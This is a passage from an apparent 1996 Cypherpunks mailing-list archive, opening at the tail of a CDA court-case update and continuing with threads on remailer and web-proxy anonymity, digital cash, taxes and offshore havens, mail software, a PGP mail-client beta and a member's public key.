Journalists and Authors, Feminists for Free Expression, Palmer Museum
of Art, Philadelphia Magazine, Psinet, Inc., and the Reporters
Committee for Freedom of the Press.

Some of my favorite excerpts:

   It is not only speakers on the Internet who feel the chill posed by   
   the CDA. The millions who access speech on the Internet feel it as
   well. [...] Recipients of speech are equally entitled to protection
   under the First Amendment. That protection is afforded "to the
   communication, to its source and to its recipients both." Virginia
   State Board of Pharmacy v. Virginia Citizens Consumer Council, 425 U.S.
   748, 756 (1976). 

   Abuses involving "indecent" and "patently offensive" behavior also
   are perpetrated today, and the Internet is the quickest and most
   effective tool for exposing them. One wonders whether the
   disappearances or indeed the Holocaust would have occurred so brazenly
   if the Internet had been reporting on them twenty or sixty years ago. 


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                                 WHAT'S NEXT?
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

The closing arguments for our case are scheduled for May 10, when the
plaintiffs and the DoJ will present an expected four hours of closing
arguments. The three-judge panel likely will issue a decision three or
four weeks later, and appeals from either side go directly to the
Supreme Court.

What happens if we lose? The ACLU's Ann Beeson said on HotWired's Club
Wired last week:

  Losing the facial challenge would not by any means end the matter --
  that is, we could still argue that the CDA is unconstitutional "as
  applied" to particular defendants that DOJ decided to prosecute.
  Of course, in the meantime we'd still see a huge chill on protected
  speech...

  It is clear that we have the facts on our side -- the much harder
  question is the law itself, and unfortunately, it is a rare day that
  a federal court will overturn an Act of Congress. (But I remain
  cautiously optimistic.)

If you're near Philly, stop by the Federal courthouse at 7th and
Market Streets at 9:30 am on Friday. The courtroom will be packed.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court on May 10 for closing arguments.

Mentioned in this CDA update:

  Excerpts from DoJ and anti-porn groups' CDA briefs:
    <http://fight-censorship.dementia.org/dl?num=2387>
  Transcript of Olsen's "-L18" description and other testimony:
    <http://www.cdt.org/ciec/transcripts/April_15_Olsen.html>
  More on ACLJ and Rimm study:
    <http://fight-censorship.dementia.org/dl?num=2328>
  Jake Baker story on EFF's web site:
    <http://www.eff.org/pub/Legal/Cases/Baker_UMich_case/baker.st




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 6 May 1996 06:50:13 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: WWW proxies?
In-Reply-To: <v02120d03adb27fe340c9@[192.0.2.1]>
Message-ID: <Pine.LNX.3.93.960505143021.706B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 5 May 1996, Lucky Green wrote:

> Of course these sites are in an ideal position to log their user's every
> move. With so many users making all their http requests through a single
> site, the commercial value of the information that could be gained by
> logging traffic at the site is tremendous.
> 
> Only when a network of anonymizing sites is connected through something
> like PipeNet and the users are either PipeNet nodes themselves, or at least
> randomly use various PipeNet nodes for their http connections, does the
> security of the user increase.
> 
> With only one hop, IMHO, the potential risk outweighs the potential
> benefit. I'd advise against using such single-hop http anonymizers. YMMV.

The same is also true for cpunk and penet-style remailers that do not use
encryption.  You always have to trust remailer operators regardless of whether
encryption is used or not.  The situation will become much better when there
is some way to chain proxies and encrypt to each individual proxy.  If the
operator of a proxy is more trustworthy than the operators of any sites you
visit using the proxy, then you have nothing to lose.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMYz1ZLZc+sv5siulAQEgXgQAhuCV9a++OqPl/eyjlF2oPusD8284meQw
tnoBp5sNZBISxjeqS1IXSyJjXmkFavwGTBzvKIoLVEirgU+wMtvpLXHQQxTsy9GA
vjRE2Zu11U0dhiOhHKCQ6mLIv54Rxm6lm7o7zgBvj/cMEJ5FdCoLmmayqPAfBmbg
XfTuNc+VhHM=
=Ru/5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.NCR.com>
Date: Mon, 6 May 1996 11:49:02 +0800
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <2.2.32.19960505184409.006579e0@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, May 9, 1996

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's
anonymous e-mail server, "mixmaster", exchange keys, and discuss other
topical CP stuff.  There's always the semi-topical discussions; Internet
Service Provider in San Diego (providing, anonymous remailers and other
privacy services), stelth communications, latest Cypherpunk goings-on,
Internet happenings.

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your key fingerprint.

Drop me a note if you plan to attend.


     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
Dreams.  They're just screen savers for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Mon, 6 May 1996 00:33:42 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Kid Gloves or Megaphones
In-Reply-To: <01I4BJ3PYULW8Y53GG@mbcl.rutgers.edu>
Message-ID: <318CAAD4.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH wrote:
> 
> From:   IN%"shamrock@netcom.com" 21-MAR-1996 21:29:06.87
> 
> >It is true that the issuer is unable to discover that double blinding is
> >being used. The real problem with the protocol is that it requires
> >payor/payee collusion, which may make it difficult to execute.
> 
>         Can the payee discover that the payor isn't colluding before the bank
> can figure out who the payee is?
>         -Allen

Of course.  With the modified protocol the payor has no choice in the matter.
It's a case of giving the payor a blinded unsigned coin and demanding he get the bank
to sign it - if he doesn't do this the payee will notice immediately.
Even with payor and bank collusion there is nothing that can be done to identify
the payee.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Mon, 6 May 1996 10:59:08 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <9605052229.AA12098@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Jon Lasser wrote:
> On Fri, 3 May 1996, Sandy Sandfort wrote:
[snip] 
> > 6)  DON'T talk to anyone else--especially in your home
> >     country--about what you have done, are doing or
> >     are planning to do.
[snip]
> > 8)  Send me $1000.  If you follow my steps 1-7, you will
> >     save many times that amount.
> 
> There's the rub... step 8 violates step 6. If following your directions 
> indicates a moral obligation to pay, doing so would violate your 
> directives and make one _not_ obligated to pay... :-)

Obviously we should send Sandy $1000 whether or not we follow the
other steps, in order to defeat traffic analysis.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Mon, 6 May 1996 01:43:14 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <adb163b00102100471cc@[205.199.118.202]>
Message-ID: <Pine.GSO.3.93.960505164315.24002H-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


 Sat, 4 May 1996, Timothy C. May wrote:

> Not wanting to join in this bashing of taxes--my views are clear, as
> evidenced in the title of this thread--but I have to point out that I paid
> approximately 60% of everything I made last year to the tax collectors!
> This counts the Federal income tax (about 32%), the California income tax
> (about 11%), the "self-employment tax" (FICA) for some consulting I did
> (15%), property tax on my old residence ($2200), property tax on my new
> residence ($4200), sales tax on purchases (8.25%), gasoline taxes (about
> 30-40 cents per gallon), a special tax on my Ford Explorer ($300), and
> probably some miscellaneous other taxes I have neglected.

Here in Estonia there was a proposal made in the parliament to remove
taxation on corporate income (right now there is a proportional corporate
income tax of 26%), which should bring more foreign investments into
Estonia and also make Estonian economy develop faster. Estonia I think is
one of few countries where there is a possibility of accepting this kind
of law. Of course European countries, USA and different international
financial organisations are very against this kind of law. This law would 
apply both to companies and to self-employed private persons (farmers for
example).

Other main taxes in Estonia are 26% proportional income tax for private
persons and 18% sales tax. There is also 33% tax on salaries paid which
includes social security and medical insurance.

Of course the government taxation is not working very effectively and a
big percentage of private persons and companies pay much less than what
they are supposed to. I believe this is common to many young Eastern and
Central European countries. Off-shore companies are also popular,
including Delaware, where people as I understand just do not pay the taxes
they are supposed to. Also many people use one-time off-shore corporations
for just one bigger business deal.

Juri Kaljundi
jk@stallion.ee
AS Stallion





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 6 May 1996 15:05:08 +0800
To: Jon Leonard <jleonard@divcom.umop-ap.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <9605052229.AA12098@divcom.umop-ap.com>
Message-ID: <Pine.SUN.3.91.960505173525.16845C-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 5 May 1996, Jon Leonard wrote:

> Obviously we should send Sandy $1000 whether or not we follow the
> other steps, in order to defeat traffic analysis.

Now you're talking.  Defeat traffic analysis, yeah, that's the
ticket.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 May 1996 14:22:36 +0800
To: "Mark M." <cypherpunks@toad.com>
Subject: Re: WWW proxies?
Message-ID: <v02120d02adb3027cef8a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:37 5/5/96, Mark M. wrote:

>The same is also true for cpunk and penet-style remailers that do not use
>encryption.  You always have to trust remailer operators regardless of whether
>encryption is used or not.

You have to trust *one* of the remailer operators in the chain. If there is
no chain, you have to trust the sole remailer's ISP as well.

>The situation will become much better when there
>is some way to chain proxies and encrypt to each individual proxy.

That's why we need PipeNet.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 6 May 1996 14:04:45 +0800
To: Me Too! <cypherpunks@toad.com>
Subject: Re: L. Detweiler is a CyberAngel
In-Reply-To: <199605051439.RAA10317@clipper.cs.kiev.ua>
Message-ID: <Pine.GUL.3.93.960505181051.542B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A few days ago, I forwarded along an excerpt from a recent CyberAngels
mailing where they had favorably cited a HUGE FAQ on remailers by one L.
Detweiler.

So far, four different people (or nyms) have asked me for a copy of my
remailer FAQ.

Um...

I believe you can get it at http://www.csn.net/~ldetweil/

- -rich
 (the truth is out!)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMY1TpY3DXUbM57SdAQEfgwP/a6gAKZXtsDG/rG5E+y0whaCF7qh51FCM
aa9Hr4w/v085MJ3vHmH9TtLgSvxh1mLHuzBs2X/bNh3cFaiA3qAZ5OgDZPbo/58Z
MCOlSHjPrJ+y7p56KJmUosN2VZKugeiUIvQyRT3c1b2pKcAuJf0dxKUOWCQvoi1Q
SUd3/d7bFR4=
=YXxJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 10:21:09 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Money Laundering Conference with Government Types
In-Reply-To: <01I4BK4HNTUE8Y53GG@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960505182455.1943T-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, E. ALLEN SMITH wrote:

> 	I thought people might find interesting the following conference
> that I located at http://www.oceanlaw.com/20/conf/ml.htm. Know thine enemy,
> and all that. It has a section on Digital Cash (note the title includes
> "Cyberpayments").
> 	-Allen


I think that should be

http://www.oceanalaw.com/20/conf/ml.htm
                ^

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Mon, 6 May 1996 14:04:47 +0800
To: "'cypherpunks@toad.com>
Subject: FW: Why I Pay Too Much in Taxes
Message-ID: <01BB3AB0.AC7ABA80@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Black Unicorn (in reply to TCMay):

> I have no doubt that "tax planning" works for some people, and I think
> certain people like Vince Cate may do well in places like Anguilla,
> essentially starting a business from scratch. I even have longterm hopes
> for tax havens, cyberspace tax havens, anonymous systems, etc. But this
> ain't happening soon.

Here I'm not so sure I agree.  Several of us are working on making it
happen, soon.
..................................................................................................


I have a great idea - let's start a closed, elite mailing list for "Offshorepunks".
Uni, Sandy, & Duncan et al could "show us how it's done".


<G>
     ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 11:56:29 +0800
Subject: Re: your mail
In-Reply-To: <199605052155.XAA01260@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.93.960505191923.1943Y-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 May 1996, Anonymous wrote:

> Any idea on best remailer?
> 
> alpha.c2.org is a roller coaster.
> 

Try fingering:

remailer-list@kiwi.cs.berkeley.edu

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonwienk@ix.netcom.com (Jonathan L Wienke)
Date: Mon, 6 May 1996 15:17:37 +0800
To: cypherpunks@toad.com
Subject: Good mail program, Netcom settings
Message-ID: <199605060229.TAA15402@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I just switched ISP's to Netcom, and I HATE their web browser and 
REALLY hate their mail program.  Can anyone direct me to a good mail 
program that will allow me to download my mail and read/reply to it 
offline, as well as the NETCOM compatibility settings necessary to make 
it work?  Even Netscape would be preferable to the status quo, if I had 
the proper settings (DNS IP address, mail server address, etc).  Please 
respond by email to avoid further list noise.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 6 May 1996 15:21:23 +0800
To: Alan Horowitz <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <2.2.32.19960506030904.00b2c604@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 PM 5/5/96 -0400, Alan Horowitz wrote:
><< " I paid approximately 60%...." >>
>
>
>didn't the feudal vassels only pay 33% ?      To paraphrase - I forget 
>which Presidential candidate of yore - "are you better off than you were 
>a thousand years ago?"

I asked my wife about this (she is a midaeval history buff) and her response
was "depends on the time and king".

She proceeded to list off the long list of taxes that vassels could be
expected to pay.  The current taxes in California do not come close to the
arbitrary and intrusive taxes imposed in feudal times.  Taxes could be
levied at any time the lord demanded. (Check into the custom of "Tallage".)
Of course this did not include the tithes to the church (which were
manditory) or any of the special taxes for wars, ransoms, and the like... 

>ANd that's not even counting the interest you pay on your mortgage. Count 
>that, and the vassels were head and shoulders above Californians.

I suggest reading what life in that time was really like.  It makes
California seem like a Libretarians paradise in comparison.  (For example,
unmarried villein women were taxed due to the assumption that their being
unchaste lessened their value to the lord.  Sounds like something Pat
Buchannon would like to bring back...)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 6 May 1996 15:25:15 +0800
To: Sandy Sandfort <jleonard@divcom.umop-ap.com>
Subject: Re: [NOISE] CryptoAnarchy: What's wrong with this picture?
Message-ID: <2.2.32.19960506030905.00b3fab8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:37 PM 5/5/96 -0700, Sandy Sandfort wrote:

>On Sun, 5 May 1996, Jon Leonard wrote:
>
>> Obviously we should send Sandy $1000 whether or not we follow the
>> other steps, in order to defeat traffic analysis.
>
>Now you're talking.  Defeat traffic analysis, yeah, that's the
>ticket.

I thought that was what the guys sitting in the semi-concealed cars next to
the freeway were for... ]:>

---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Mon, 6 May 1996 05:08:10 +0800
To: cypherpunks@toad.com
Subject: Pronto Secure - second call for beta testers
Message-ID: <19960505171159096.AAA215@geoff.commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun May 05 18:17:49 1996

As the release date for Pronto Secure approaches, Commtouch has decided to 
increase the number of beta testers reviewing the product. We believe that 
scrutiny of the product by members of this list will help us to release a safe 
and secure E-mail client.

Pronto Secure is an Internet E-Mail client for Windows, which uses external 
security providers to enhance e-mail with cryptographic security features. 
The current version relies on the proven security facilities of PGP to 
provide encryption, authentication, integrity and key management features.

Product requirements: 
- - MS-Windows 3.1 / Windows for Workgroups 3.11 / Windows 95 / Windows NT
- - Winsock 3.11 compliant environment (TCP/IP stack)
- - Installed version of PGP.

We plan to make the next beta of Pronto Secure available via FTP by the end of 
this week. Parties interested in joining the beta-test program are invited to 
send me pgp-signed e-mail requesting download instructions. Beta-testers who 
provide us with feed-back will be eligible to receive a free final release 
version of the product. 

- -----------------------------------------------------------------
Geoff Klein                          email: geoff@commtouch.co.il
Product Manager - Pronto Secure      http:    //www.commtouch.com
- -----------------------------------------------------------------
CommTouch SW Inc,  U.S                          CommTouch, Israel  
298 S. Sunnyvale Avenue #209                    10 Technology Ave  
Sunnyvale,   CA. 94086                          Ein Vered,  40696  
Tel:    (408) 245-8682                          Tel: 972(9)963445  
                                                Fax: 972(9)961053  
- -----------------------------------------------------------------





-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMYy4jkLv5OMYFK1FAQEN+QQArOQs8TLNdexZ2TmYDl2ZvA+mowEC0w11
YtZCjXVQmu3TO+81uqH8bkLm2kX9K82s/p/KSDt+uNyO8NnafQHUPW+55zmPo93D
g+jlJ5oZVoctoqAxSWW/6TEJLcruF0C3wLneXUVhvym5Rnbgs3HjIjxc+FdXGPs8
9cXFLxdb+dc=
=j18d
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 6 May 1996 17:14:21 +0800
To: cypherpunks@toad.com
Subject: Re: WWW proxies?
Message-ID: <adb2bd9b08021004b7dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:37 PM 5/5/96, Mark M. wrote:

>The same is also true for cpunk and penet-style remailers that do not use
>encryption.  You always have to trust remailer operators regardless of whether
>encryption is used or not.  The situation will become much better when there
>is some way to chain proxies and encrypt to each individual proxy.  If the
>operator of a proxy is more trustworthy than the operators of any sites you
>visit using the proxy, then you have nothing to lose.

We haven't talked about traffic analysis of remailers and Web proxies much
lately, so it bears repeating that:

-- this is a little-studied subject

-- that nobody has done--to my knowledge--a fairly detailed study of the
traffic analysis that is possible

-- that a model is lacking (I don't mean we don't have some ideas of what's
important, but that we haven't filled in the details, figured out what
sorts of correlations an analyst can make by looking at packet sizes,
sending times, delivery times, etc.)

-- the real world situation with remailers is that message volume is
probably way too low for comfort (my presentation on remailers at the first
CP meeting outlined a need for about 10 mixes, each mixing at least 10
messages of the same size before remailing...and 20 mixes each mixing 30 or
more messages is much better...we are most likely far, far below this, for
nearly all remailed messages. Fortunately, most remailed messages are
either not critical or are being done for novelty, harassment, flaming,
etc.).

-- with Web proxies, the problem of traffic analysis (even with encryption,
which I am taking for granted) becomes astronomically larger...all those
commands sent to the site and stuff returned, and all in a "reasonable"
amount of time! (How many of us will use a Web proxy in our current mode if
we have to wait minutes to hours between actions? I'm not saying what the
response times will be, as this will depend on mixing ratios, desired
security, etc. But it is likely that "fast response" is counterproductive
to the avoiding of traffic analysis.)

(PipeNet-type schemes may help, depending on a bunch of details. So would
"local mixes in cabinets," meaning, Web anonymizers with high bandwidth
that do their mixing locally. They have to be "trusted," to some extent,
but would help a lot. There are some gotchas.)


-- I certainly believe the NSA has put at least an analyst or two on this
problem, and probably long ago put together some models.

We have a very long way to go before remailer networks are really up to snuff.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 5 May 1996 21:40:09 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: A MODEST PROPOSAL (fwd)
In-Reply-To: <199605050754.AAA02842@toad.com>
Message-ID: <199605051031.UAA18746@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 08:05 PM 5/4/96 EDT, "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> wrote:
> >	The reason I say majordomo is broken is that it shows up
> > with the address of the original sender, not the address of the list,
> > as the From address. Other mailing list software does not do this.

Majordomo is good for small lists. For anything larger, its lack of heuristics
makes it a real liability. I've converted all my lists over to SmartMail
(with some minor changes to the SmartMail code). If anyone wants a copy let
me know.

-- 
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Bulero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 6 May 1996 11:30:45 +0800
To: cypherpunks@toad.com
Subject: NOISE.SYS v0.5.5-Beta (DOS) available
Message-ID: <199605052155.RAA20467@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



NOISE.SYS v0.5.5 should be up at ftp.funet.fi in the
/pub/crypt/random/noise055.zip.

NOISE.SYS is a /dev/random-type driver for DOS systems.

Many changes in this version, including a larger output buffer, a newer (and
better) API, nice installation messages, improved (?) entropy estimation
method, and the possibility of sampling video retrace intervals (you'll have
to rebuild the source with that option enabled though).

This installation only has the barebones documentation for now. A newer
release will eventually have some nice technotes and other goodies.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordan@Thinkbank.COM (Jordan Hayes)
Date: Mon, 6 May 1996 17:23:57 +0800
To: cypherpunks@toad.com
Subject: Re:  PGP and Pine?
Message-ID: <9605060440.AA22456@blood.Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


That reminds me that I have been meaning to send out what I use for PGP
and ucbmail.  First of all, since you can ~| outgoing messages, I don't
need any support for sending.  For receiving, there's two ways to
'edit' messages: 'e' invokes $EDITOR and 'v' invokes $VISUAL on a
message.  I actually use 'v' so I set $EDITOR (in my .mailrc) to
~/bin/mypgp which looks like this:

	#!/bin/csh
	pgp -f < $* | more

So to read a PGP'd message, I just type 'e' ...

Anyone else do something interesting with ucbmail?

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 6 May 1996 14:28:56 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <adb163b00102100471cc@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960505214552.19234C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< " I paid approximately 60%...." >>


didn't the feudal vassels only pay 33% ?      To paraphrase - I forget 
which Presidential candidate of yore - "are you better off than you were 
a thousand years ago?"

ANd that's not even counting the interest you pay on your mortgage. Count 
that, and the vassels were head and shoulders above Californians.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 6 May 1996 14:30:41 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Key
Message-ID: <Pine.SUN.3.93.960505215043.23150F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


The below is the key I will be using to sign documents I submit to cypherpunks.

It's also headed for the keyservers and available by finger.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzGNKP8AAAEEAMNzMyNHEhxQsKjvvKNbODkcb9bTlTWn5mUl++lHE+fWsdBr
iSnl0MyXHtRPsz3GarHMIdtszdZtPoX1mvSIZ34RE10kzdcw7rheuPjWXlY9gZ7Q
VNAn/tXClUoCposaUfI72nclJk4DRhip59WIi3ZNH6gDjjR3dmqgui0rHO4JAAUR
tDdCbGFjayBVbmljb3JuIERvY3VtZW50IFNpZ25pbmcgS2V5IDx1bmljb3JuQHNj
aGxvc3MubGk+iQCVAwUQMY1Xnmqgui0rHO4JAQHqtQQAihgWtmSsAn02Kddj25tH
mDd7nnlfFvzyNYDOLNhzZlRlE75ur32wuAIaMo3LsNmlEUmZkFZPRZ9NOr5pR/Lw
bMq/xJK060cyEWYEdy7u4Lbbn/7ANKUfhMKqsWjPVEeL3vxOgbsVgXyxD/5rDxL8
tvr1ZlnKfIj9v8LUO128TUWJARUDBRAxjWRQLWieb05oXTkBAfbeCACzNI/pmMPu
IlLfEN/Fu5IAVD72btGQz+5uS9dX2pzTIZCkmHra1w/qLOAmQwQtChuMdqHd1no9
/FX6I3t7/AWbglxFtmb7D/fCA8GAozZpPrOwM6jt/qkVjOo3adowv/n152lf2jOZ
7Gjk2AQuEYXZsCxZqPNwAS82gzm7vFhSU63yltpTWgeaesgapUhpDzGxNe+K3fya
hXiklRZp3U19rOFNvdjgGy1Cm3HNVgTXjaYnB9o1yVAE5Eazu7U2XRYz/RWzVDSf
HM1fJaGJwhyDsFIIsZUFTLJtoX4OF34GDR0ucjQJGaa33j1hPaSgtH0x/GuJ7pQL
AZniS4SliZac
=8GgR
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

